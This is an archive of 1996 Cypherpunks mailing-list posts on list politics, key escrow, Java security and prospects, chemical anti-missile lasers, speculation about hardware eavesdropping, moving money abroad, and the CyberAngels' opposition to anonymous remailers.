>more of a mainstream group.  Nevertheless I am determined to act as
>though the group favors unlimited access to privacy tools by individuals
>and to post under that assumption.  If it comes to the point that someone
>complains there may have to be some air clearing but I don't think it's
>likely to come up.

I don't disagree _necessarily_ about separate lists. But I think some
discussion beforehand would have been nice....were any of you reading this
involved in such discussions? I know I wasn't, nor was there any public
list discussion that I saw.

There are lots of issues we could consider about future directions for our
main group, or for sublists, etc. The "by invitation only" nature of the
Coderpunks list, at least before the L. Todd Masco announcement of its
existence, seems like rather a harsh way of avoiding off-topic posts.

It does distress me that the main list is now so bogged down in
back-and-forth flames, ad nauseum. And contrary to Perry straw man
assertions, I have never argued for this as a desirable thing. My main
objection to Perry's objections is that he rarely posts essays or work
results, preferring instead to send "perrygrams" stating his unhappiness
with some topic. My preference, and I think my posts generally show it, is
to avoid "timgrams" saying a topic if off-charter and simply lead by
example, as it were, by writing articles and essays I think are germane.
Those who don't like my choice of topics are free to delete them. But this
is a different thing than saying the current banality of the list
discussion is _caused_ by me, as both Perry and Detweiler seem to think is
the case. Basic errors of logic covered in Logic 101.

>Cypherpunks continues to have a lot of vitality.  What I object to most
>is the back and forth arguments people get into.  I don't mind reading
>one message off-topic, but to have the thread drag on for days, with
>dozens of messages, is wasteful.  People should just make their points
>and let them stand.  They shouldn't feel they have to keep coming back
>and refuting the other guy.

I of course agree with Hal on this.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 26 Apr 1996 17:40:35 +0800
To: cypherpunks@toad.com
Subject: [NOISE] What is "laser material"?
Message-ID: <199604260403.VAA23917@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>   The Washington Post, April 25, 1996, p. A12.
>
>
>   Israelis Eye U.S. Laser As Anti-Rocket Defense
>
>       'Nautilus' Beam Burns Surface of Weapon
>
>   By John Mintz
>
>...
>   Moreover, a laser shot costs $3,000, compared to several
>   million dollars for a missile. Army officials envision the
>   Nautilus would be beamed from a truck capable of firing 50
>   shots before requiring more laser material. 

Does anyone have any idea what "more laser material" means?


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 26 Apr 1996 17:16:11 +0800
To: cypherpunks@toad.com
Subject: Re:  US law - World Law - Secret Banking
Message-ID: <199604260406.VAA07851@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Another thing Baker said in that report about Japanese crypto policy was
interesting.  He was talking about key escrow and how he thought the
Japanese discussions about it were on the wrong track.

Apparently the Japanese idea of key escrow combines it with a government
Certification Authority (CA) infrastructure.  You get certified keys
which you will use in commerce, and these keys are escrowed.  (Japan is
not showing much enthusiasm for the escrow idea, to Baker's displeasure,
but they are discussing it.)

Baker's problem was that the keys would be used for signing as well as
for encryption.  He said that in the U.S. they had been careful to
separate these functions in their plans.  That's why we have DSS for
signatures and Clipper (Capstone, Skipjack, etc.) for encryption.  Only
the Clipper keys get escrowed.  The DSS keys are kept private.

The problem with using one set of keys for both functions (as for
example when RSA keys are used for both encryption and signing a la
PGP) is that the escrow people can not only defeat encryption, they can
forge signatures.  If escrowed keys were stolen, not only would privacy
be lost but also the reliability of signatures.

Now at first this seems strange.  Why would it be more of a problem that
a broken escrow could forge signatures than break privacy?  Well, from
the corporate point of view it could be a lot worse.  When you get a
signature on a business document you want to be able to trust it.  If a
company can hope to get out of a commitment by saying that hackers must
have broken in and stolen the keys, the value of digial signatures is
much reduced.

Privacy, on the other hand, at least from the point of view of someone
like Baker, is not as important.  His people eavesdropped all the time,
and it wasn't that bad.  So from his perspective it is reasonable that a
possibly insecure escrow system is acceptable for encryption, but not for
signatures.  And that is apparently a principle behind the US crypto
policies as they have unfolded over the last few years.

This may shed light on the battle a few years back over whether RSA
signatures would be adopted as the digital signature standard rather
than the discrete log system which was finally chosen.  It also
suggests that the government has long realized the difficulties of
keeping the escrowed key database secure.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 26 Apr 1996 17:52:30 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Mindshare and Java
In-Reply-To: <Pine.GUL.3.93.960425164813.27532L-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SOL.3.91.960425210631.23458A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Apr 1996, Rich Graves wrote:

> In my fantasy world, I'm not asking you to verify signatures every time
> you run something. Maybe you can tune how often you want stuff checked, so
> you have a tradeoff between security and performance.

In SolidOak, the verification is more or less free of charge, as it runs
the signature code in a separate low priority thread, which often gets to
complete during network induced latencies when fetching sub-classes, which
can be initiated on class download before the code is instantiated.It also
allows multiple classes to verified with just one PKOP, so the cpu cost 
is amortised over a lot of stuff

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Fri, 26 Apr 1996 16:07:19 +0800
To: "'Rich Graves'" <llurch@networking.stanford.edu>
Subject: RE: Mindshare and Java
Message-ID: <01BB32F0.873B2240@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


> Yes, I had the misfortune to post that skeptical bit at precisely the same
> moment that the public press releases were proving me wrong :-(

[shrug] Happens to all of us.  Sometimes just keeping up on press releases
seems to be a full time job.

> My source at the PDC indicated that Microsoft was still pushing Visual
> Basic, but I'll accept that there's been a change... 

They are, but not exclusively.  They are supporting both JavaScript and VBScript
in IE3.  For that sort of work I think Basic might be more appropriate anyway.
(Added to the fact that they have committed to making the reference source
for VBScript available online with a free for whatever you want type of license.)

The spin at TechEd last week seemed to be a complete spectrum running
C++ -- Java -- VB depending on the desired speed/control vs. easy of 
development.

> Still, integrating Java and Internet browsing into the OS does not bode
> well for Netscape. 

<CRYSTALBALL>
My bet is that five years from now Netscape will be remembered as the
company that forced MS to give it away for free.
</CRYSTALBALL>

-Blake (who's keeping all his irons in the fire anyway :-)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Apr 1996 17:27:17 +0800
To: cypherpunks@toad.com
Subject: RE: Mindshare and Java
Message-ID: <ada599332402100402fc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:45 AM 4/26/96, Blake Coverett wrote:

>> Still, integrating Java and Internet browsing into the OS does not bode
>> well for Netscape.
>
><CRYSTALBALL>
>My bet is that five years from now Netscape will be remembered as the
>company that forced MS to give it away for free.
></CRYSTALBALL>
>
>-Blake (who's keeping all his irons in the fire anyway :-)

I tend to agree with Blake on this, as one might expect. Speaking as a
longterm Mac user, I certainly feel no compulsion to drop my Mac/Netscape
package and switch to Microsoft.

Bundling Java in with Windows (which actually was reported as long ago as
last Friday, on C/NET's page, http://www.cnet.com/) may be a near-necessity
for Microsoft, and for other OS vendors.

Apple is also reported to be planning to make its next OS major release,
"Copeland," an "Internet-savvy" release. Its "CyberDog" (dumb name) will be
bundled with Java as part of Copeland. Metrowerks (the Code Warrior people)
is said to be a partner in this.

Symantec's "Cafe" JIT compiler for Java is reported to have a 13x speedup
over JDK code, and is only slightly slower than compiled C code.

Borland is also working on JIT stuff, reportedly for Sun itself.

How it all shakes out remains unclear, but I stand by my "mindshare" point
of view, that Java is fast-becoming a lingua franca for Web-centric use. (C
certainly was, in a different sense, not for cross-platform easy use.)

I'll bet, however, that Microsoft will not be "winner-take-all" in this.
They're doing some impressively nimble rearrangements of plans, but there
is little indication they'll be able to dominate things.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 26 Apr 1996 16:19:42 +0800
To: cypherpunks@toad.com
Subject: VENONA followup
Message-ID: <199604260215.WAA14321@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Last year DCI Deutch said that as part of the new "openness" 
for
intelligence archives and as followup to the release of VENONA
documents, a conference was planned on Soviet
intelligence attempts to penetrate the USG in the 1940s and 
1950s.
(See excerpt below.)


Has anyone heard more on this conference?


----------

http://www.odci.gov/cia/public_affairs/speeches/dci_speech_71195.
html
   
DCI Speech 7/11/95

DCI John M. Deutch at VENONA Press Conference
  
[Snip]   
   
   Next year we will sponsor a conference on Soviet 
Intelligence attempts
   to penetrate the United States government during the 1940s 
and 1950s
   and our efforts to counter those efforts. We hope that all 
scholars
   will attend, including Russian scholars.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Apr 1996 18:58:27 +0800
To: cypherpunks@toad.com
Subject: Re: US law - World Law - Secret Banking
Message-ID: <ada59fc1270210048d39@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



On the issue of "money leaving the country illegally" (the general notion
that people taking money out of the country in suitcases or in charged-up
smartcards are doing something Evil and Unclean).

Just as we (and Phil Zimmermann, who widely made this point) were able to
convince a lot of people about strong crypto by talking about "sealed
letters" vs. "postcards," so, too, do we need to make the same points about
"untraceable cash flows" and even about "taking money out of the country."

I imagine this conversation with my father:

Dad: "But if the government needs to trace the spending of illegal money,
then these anonymous transfers you've been telling me about need to be
outlawed."

Me: "Can the government track that $100 you spent last week? Should it?"

Dad: "Well, no, that's my money and it's none of the government's damned
business what I spend it on."

Me: "So, we agree."

Dad: "Well, but the drug dealers have to be tracked."

Me: "First, the drug dealers are likely dealing in such mega-quantities
that they'll simply find compliant banks and other ways to hide the
transfers. It's unlikely that any of the proposed tracking schemes will be
effective. Second, how can the government possibly know which funds are
drug-related and which are not? Their scheme involves sacrificing
fundamental liberties for the dubious possibility that _some_ drug dealers
will be caught. Random raids on  houses would probably work better, but of
course would be just as unconstitutional."

Dad: "But then what do we do about the drug dealers?"

Me: "You and me don't do drugs. So what's the problem?"

Dad: "But..."

Me: "Name a drug that kills more people per year than alcohol. Or nicotine."

Dad: "Well...."

[My father, at age 72, has come around to the "legalize all drugs"
position, a view also supported by noted thinkers and former politicians,
including former Secretary of State George Schulz (or Shultz, or some
variant).]

I 'm convinced that a similar argument applies to those transferring funds.
Many funds transfers are not even tax evasion; I am one of many people who
are researching ways to expatriate some or all of my funds to jurisdictions
friendlier than the U.S. So long as I fill out the proper boxes on my 1040,
and pay appropriate taxes, I am committing no crime by moving my wealth to
some other country.

Those on the list about a year or so ago may recall that there are
proposals to in fact impose a "capital flight tax." This would make the
U.S. a country very much like the former Soviet Union, which forbade such
transfers of wealth without payment of heavy taxes.

The recent FinCEN-friendly conference in San Francisco raised the alarm
about digital cash and smartcards being used to make money transfers
easier. Horrors!

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 26 Apr 1996 19:33:55 +0800
To: cypherpunks@toad.com
Subject: The Joy of Java
Message-ID: <199604260527.WAA02314@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



 > "Krakatoa--East of Java"

An excellent Rant in which our Titular Leader, Tim May, sings the
praises of Java and denounces an evil sect of Crypto Separatists,
the self-described "Coderpunks."

 > Well, I was not invited to join the elite and secret
 > coderpunks list, but I still have some thoughts on coding
 > and, especially, on the opportunities offered by Java. Sorry
 > if this interferes with discussions of Rabbi Heir and Morris
 > Dees.

Given the various parameters which determine the life and death
of mailing lists, I fully expect Coderpunks to become moribund
within six months, and its members to reunify with this list.

Very few of these "I'm going to start my own list with less
noise" adventures ever make it long term, absent the
personalities and critical mass of interesting information which
drove the list they spun off from.

 > 1. Java is of course not a perfect language, nor even the
 > best for specific applications. Other languages will
 > continue to thrive. Critics of the language and related
 > items (applet model, JDK, JITs, etc.) may point to various
 > problems (e.g. security).

 > 2. However, the "big picture" is compelling. Java arrives
 > at a time when a Babel of languages and platforms threatens
 > interoperability. C++ is despised by many (though, to be
 > fair, liked by many, too), and developers are adopting
 > Visual Basic (and the vbx widgets, etc.), PowerBuilder,
 > Delphi, flavors of Smalltalk (no pun intended), and
 > scripting languages (Perl, TCL, Python, etc.).

I completely agree with this.  Java incorporates the type of
automatic corruption-proof memory management found in languages
like APL, the basic notions of object oriented programming, fast
dynamic linking, and a C-like program structure.

This is powerful combination of features and gives Java the
potential to do all the platform-independent things that were
advertised for C before the rude reality of thousand line
makefiles reared its ugly head. . The complete specification of
the Java Virtual Machine means that the behavior of Java programs
is perfectly well-defined, and one does not have to tweek
anything which is processor or operating system dependent.

In the future, I expect Java bytecode to become a significant
channel for the distribution of popular applications, with
compilation to fast native code on numerous platforms.

Java is clean, and its concepts are easily understandable even by
persons whose eyes glaze over after the first 30 pages of the C++
manual.

 > 4. What is so compelling, to me, is that Java programs have
 > an excellent chance of running on various flavors of Unix,
 > on Windows-95 and NT systems, on Macs, and on other systems
 > without changes, and without any special compilers bought by
 > the users! (Netscape browsers, and even Microsoft browsers,
 > are able to view applets, or soon will be. And cheap or free
 > applet viewers are available.)

Expect NT to be a Unix-killer in the future.  It can be ported to
any machine, and its microkernel client-server design with
pluggable third-party APIs permits it to manifest simultaneously
the personalities of numerous different operating systems.
Contrast this with the many different binary incompatible Unix
flavors and its marketing advantage becomes clear.  NT sales just
broke one billion per year and are climbing steadily.

NT and Java will be the big players in the future.  If Netscape
becomes its own OS, requiring no Microsoft software, it will
probably capture the low-end "Web TV" market.

 > 6. One can imagine several applets of interest to
 > Cypherpunks. The ability to fairly transparently run them on
 > multiple platforms, effectively bypassing the platform
 > dependencies, is very important. Check out Hal Finney's site
 > for some "crytographic primitive" applets he's written.

Indeed.  One can imagine a nice set of Java classes and methods
which interoperates with PGP, and has none of the fixed buffer
allocation, limits, and awkward memory management present in PGP.
Java tends to do the kinds of things PGP does very cleanly, and
implementors can worry about the algorithms without being
distracted by housekeeping.  Any code produced can instantly be
used by others in their applications.  This is a powerful
paradigm, encourages others to expand on existing work, and
renders kludges like "PGPTools" unnecessary.

 > 10. "Mindshare" is the real story. Java arrives at the
 > right time. Cypherpunks needs--those needs that go beyond
 > just the "sealed envelopes and signatures" level which PGP
 > provides so well--are likely to fit in with this Net-centric
 > communications model. (I'm already thinking in terms of Java
 > applets for building blocks for Cypherpunk sorts of things.)

Java Applets, mobile crypto agents, and the new Web-centric view
of cyberspace will go a long way towards encouraging the
planet-wide use of strong crypto, as well as effectively swatting
annoying mosquitos like ITAR.

Indeed, with Java, I can put up a Web page which teaches someone
about a cryptographic algorithm, allows him to try it out and run
sample data through it, and provides him with a
platform-independent implementation of it to use as he wishes.
All in one fell swoop.  That's a pretty powerful concept.

Java has come at the right time, and it will produce chaotic
change in the existing order.

Should be interesting.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Apr 1996 18:48:46 +0800
To: cypherpunks@toad.com
Subject: Re: Capability Security in Java
Message-ID: <ada5a45428021004a064@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:58 AM 4/26/96, Bill Frantz wrote:
>At  4:38 PM 4/25/96 -0700, Simon Spero wrote:
>>One thing that could be retroactively added to the vm pretty easily would
>>be the ability to add capability requirements to methods, and have the
>>class loader automatically generate code to check for those requirements
>>before executing the body of the method
>
>Now there is a statement that makes me sit up and take notice.  I certainly
>havn't thought this subject thru carefully, but to start, I think I would
>like capabilities to be held by a specific object, so if I give a Java
>object permission to read a file, that permission is not automatically
>inherited by other objects, or instances of the same object which use the
>common method.
>
>There would also have to be a technique where capabilities could be passed
>from object to object to allow subcontracting.
...

There are two major security enhancements of a "fundamental nature" that
are being discussd, that I know of:

1. Sun and JavaSoft are talking about "signed classes," using full-blown
digital signatures, in a future release. Some of the Java developers talked
at a Cypherpunks meeting last June or so about this (before Java became so
hot and they would only speak at Moscone Center before crowds of 1000 and
up).

2. Electric Communities has developed a superset of Java called E,
available for downloading and whatnot at http://www.communities.com/. It
offers a set of capability-based security features which are quite
interesting.

(Several Cypherpunks work at EC, of course.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lou Zirko" <lzirko@isdn.net>
Date: Fri, 26 Apr 1996 16:58:23 +0800
To: Hal <cypherpunks@toad.com
Subject: Re: Golden Key Campaign
Message-ID: <199604260335.WAA10521@rex.isdn.net>
MIME-Version: 1.0
Content-Type: text/plain


Ok! OK!  I expect to get hit for this, but maybe we could set up a 
graphic on our pages with the "broken Key" from the lower left corner 
of Netscape to commersate the RSA date.

> Date:          Thu, 25 Apr 1996 12:08:08 -0700
> From:          Hal <hfinney@shell.portal.com>
> To:            cypherpunks@toad.com
> Subject:       Re: Golden Key Campaign

> From: frantz@netcom.com (Bill Frantz)
> > Some people say that the millennium comes on Jan 1, 2000.  Others say it
> > comes on January 1, 2001.  I say it comes on September 20, 2000 when the
> > RSA patent expires.
> 
> It is traditional to commemorate big events with annual observances.  I
> say there's no reason the observances can't predate the event when it is
> known in advance.
> 
> So I propose that September 20 be known as Crypto Freedom Day, and an
> annual celebration be held on that day.  With each year closer to 2000
> the party gets bigger, culminating on the day that the patent actually
> expires.  We can all run our RSA in three lines of Java that Adam Back
> will have prepared, and taste for the first time the freedom which the
> rest of the world will have known for the past 17 years.
> 
> Hal
> 
> 
Lou Zirko                                (615)851-1057
Zystems                                lzirko@isdn.net
"We're all bozos on this bus" - Nick Danger, Third Eye
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQENAzFseHQAAAEH/2gtDJSlsDvTo7m+Caj5zKuLO4dVl6L9e4xxFOAqKMtkHDIh
2z6NqqGnAKDai3eDXInBuOTGoyb82pkV7wD7naQDx7bppfwmJNguOPvlrErOZHcA
NbAkyXCoKHgDxeXLq0MMcyC8+kBxYNKhMPm17g7tny4DKD+fzat4k3UiSAves6Y7
jLgQwwQ7TLYIGg7iPAsbMTnOF5iP51Ib47Ozjb3suJvJjUOTSUdl4V3e9EHWiniH
G6kI1cfOdUmLXIgNZ34utTwwb2H/LhEDYrydmXJG6FfUolAThCwCbTG++Hq7/Ywr
BOawFj3BhySTvpp/bSCJt1Mz/eELEq9xwQCaVD0ABRG0G0xvdSBaaXJrbyA8bHpp
cmtvQGlzZG4ubmV0PokBFQMFEDFsfBcSr3HBAJpUPQEBRHoH/R+rkuMa9Vw+Civd
5QQM0tBMEPDUa7G2qNLKO0FBmVHoqq+VGeD9X2X+EBld0AwuWvshQfsViG2uBNxk
Cr44y+Q0tXByCZqR8snTZG12BtFaCZv51XVieo2ygWQdmNp5DyMEyIOXUByORT2m
2Jx2VngcFt5rpzZLRALqwBDkV00Xcm8MPQzqGq8ZQA3nmExQkdpnSJIJX0irWjDM
OueDrn9mBz2NwIZmddShYGUdhRXgpLYPHLMpo2fxE0dXiWkaDlyx47k4MIWaDoF4
nnTXxmEcS98AkT2PfqU4dT3UfZpZnHqkWQ7d4JqvXs9RmmH9K/NyBB+LykOvA1/t
W6deAaWJAJUDBRAxbHtD30Eh39zrXZUBAYPsA/0dIEjlSuc8wrX5KJzAhXqUKBbg
e3toQJk8RZwm4f80SC2DopEXYdmwAVrhOou7vezeu29mYVunKaDKg5xjnUfVR1WS
ZXy54ZfYEG4Zrdi4vJgydb96AwoF3VAYyAbV45XBTfy3ujZjZRxpZS96X7iKk+6l
quslrTmMFLhju4vWKw==
=wksf
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 26 Apr 1996 19:49:16 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: Re: [NOISE] What is "laser material"?
In-Reply-To: <199604260403.VAA23917@netcom9.netcom.com>
Message-ID: <Pine.SOL.3.91.960425224319.23458D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


÷On Thu, 25 Apr 1996, Bill Frantz wrote:
> >...
> >   Nautilus would be beamed from a truck capable of firing 50
> >   shots before requiring more laser material. 
> 
> Does anyone have any idea what "more laser material" means?

I think it's something nasty like a flouride of some kind (I seem to 
remember reading that the biggest problem with anti-missile lasers has 
been stopping them frm disolving the pongos firing it. 

Definitely sounds nice if it works. I've had scuds fired at me and I 
didn't enjoy it :)

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Fri, 26 Apr 1996 19:07:00 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] What is "laser material"?
Message-ID: <199604260554.WAA05440@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>>   The Washington Post, April 25, 1996, p. A12.
>>
>>   Army officials envision the
>>   Nautilus would be beamed from a truck capable of firing 50
>>   shots before requiring more laser material. 

At 09:05 PM 4/25/96 -0700, Bill Frantz wrote:
> Does anyone have any idea what "more laser material" means?

It is a chemically pumped laser.  The lasing material is driven
to population inversion by a shock wave passing through explosive
material.  There is a loud bang, and all the optics go to hell for
a while.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Apr 1996 20:04:34 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] What is "laser material"?
Message-ID: <ada5ab6d290210044b66@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:05 AM 4/26/96, Bill Frantz wrote:

>>   Moreover, a laser shot costs $3,000, compared to several
>>   million dollars for a missile. Army officials envision the
>>   Nautilus would be beamed from a truck capable of firing 50
>>   shots before requiring more laser material.
>
>Does anyone have any idea what "more laser material" means?
>

Sure, most high-power lasers like this are chemical lasers, consuming
reactive materials.

(This is not the same as "gas lasers," a la the early CO2 lasers. And of
course ruby and Nd-YAG lasers are not what is meant here, either.)

P.S. I don't place much faith in laser weaponry. Some obvious
countermeasures are: spin the projectile to minimize heating of any one
spot, determine the wavelength of the planned laser and coat the projectile
with a suitably reflective coating, apply ablative layers that can burn off
without harm, etc. Such countermeasures are of course well-known to the
laser builders, but they still make the game much tougher. All a matter of
attack and counter-attack, and the costs of each. Like castles and siege
engines. Or like crypto.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Fri, 26 Apr 1996 19:33:50 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: trusting the processor chip
In-Reply-To: <m0uCa4r-00094aC@pacifier.com>
Message-ID: <Pine.3.89.9604252347.A18926-0100000@netcom13>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 25 Apr 1996, jim bell wrote:

> At 01:53 PM 4/25/96 -0400, Jeffrey C. Flynn wrote:
> 
> >I received several responses to this question.  My favorite was as follows...
> >
> >>This is probably science fiction, particularly at the VHDL level.
> >>Maybe someone could make a crime of opportunity out of a microcode
> >>flaw, but there's a risk of it being found out during testing.
> >>
> >>To do it right would require collusion of the design and test teams.
> >>They need to ensure the back door stays closed, isn't tickled by
> >>"normal" testing and only opens when really requested. So a lot of
> >>people are in on the secret even before it gets exploited for
> >>nefarious purposes.
> >>
> >>And what nefarious purposes would pay for the risks and costs of this?
> >>If the secret got out, the design team, product line, and company
> >>would be dead in the marketplace and probably spend the rest of their
> >>lives responding to lawsuits. What could you use this for that is
> >>worth the risk?
> 
> This analysis seems to assume that the entire production run of a standard 
> product is subverted.  More likely,I think, an organization like the NSA 
> might build a pin-compatible version of an existing, commonly-used product 
> like a keyboard encoder chip that is designed to transmit (by RFI signals) 
> the contents of what is typed at the keyboard.  It's simple, it's hard to 
> detect, and it gets what they want.
> 
> Jim Bell
> jimbell@pacifier.com
> 
> 

This is getting more rediculous by the minute. If NSA wanted to find out 
what you were typing, they dont need to subvert microcode or chips on the 
board. Unless you have a tempest device - all they have to do is pull RF 
from your vicinty  and they can *see* just exactly what your typing.

>From the powerline, from the air - choose your poison.

...Paul

-------------------------------------------------------------------------

"Faced with the choice between changing one's mind and proving that there
 is no need to do so, almost everybody gets busy on the proof"

                                            -- John Kenneth Galbraith

"Success is attending a funeral as a spectator"

                                            -- E. BonAnno 

-------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 27 Apr 1996 00:17:25 +0800
To: cypherpunks@toad.com
Subject: [fight-censorship] Guardian Angels v. anonymous remailers
Message-ID: <Pine.GUL.3.93.960425234353.940C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Interesting and well-written piece. Followups, if any, will be at
http://fight-censorship.dementia.org/fight-censorship/top/

I assume that Declan is just observing how Safesurf operates. My view is
that these private "decency" registries are a healthy part of the free
market. Of course the "Angels" are a bunch of hypocrites, but the part
about rating sites I support. Let the prudes censor themselves; it's a
free net.  If anyone tries to sabotage Safesurf by rating things the
"wrong" way, then they're an asshole. (I am *not* accusing Declan of
advocating this, because he isn't -- it's just something that crossed my
mind. Tempting, but highly counterproductive.)

-rich

---------- Forwarded message ----------
Date: Fri, 26 Apr 1996 01:43:25 -0400 (EDT)
From: "Declan B. McCullagh" <declan+@CMU.EDU>
To: Fight Censorship Mailing List <fight-censorship+@andrew.cmu.edu>
Cc: angels@wavenet.com, mnemonic@well.com, cp@panix.com
Subject: Guardian angels, the decency brigade, and cyberseraphim

Attached is a message from the CyberAngels asking for rating volunteers.

Jim Thomas published a fascinating and illuminating article documenting
the seamier side of these self-appointed net.vigilantes in the Computer
underground Digest earlier this year. (I vaguely remember some legal
threats soon afterwards.) Their authoritarian and anti-privacy leanings
are clear in their FAQ, at <http://www.safesurf.com/cyberangels/>:

  9) What kinds of changes would the Guardian Angels / CyberAngels like
  to see?

  a) We would like to see an improvement in User identification. User ID is
  impossible to verify or trace back. The very anonymity of Users is itself
  causing an increase in rudeness, sexual abuse, flaming, and crimes like
  pedophile activity. We the Net Users must take responsibility for the 
  problem ourselves. One of our demands is for more accountable User IDs
on     the Net. When people are anonymous they are also free to be
criminals.
  In a riot you see rioters wearing masks to disguise their true identity.

So much for anonymous remailers! But the CyberAngels, in a fit of almost
 painful hypocrisy, use anonymous remailers themselves, as Charles Platt
recounts in his book _Anarchy Online_:

      How would this decency crusade actually work in 
 practice? Well, later in 1995, one net user received the 
 following not-very-friendly, not-very-literate warning, sent 
 via an anonymous remailer: 

          The Net is out of control, sex crimes, hate crimes 
     and felonies. 
          Just as on the streets, CyberCrime is committed by 
     a minority of criminals who destroy the quality of life 
     for an innocent majority. And just like on the streets 
     the Guardian Angels will combat it. 
          We have good reason to believe that you are 
     involved in unlawful, harmful, hateful, threatening 
     and/or harassment, particularly relating to minors. We 
     will be watching you. 

      The netizen who found this in her mailbox was baffled 
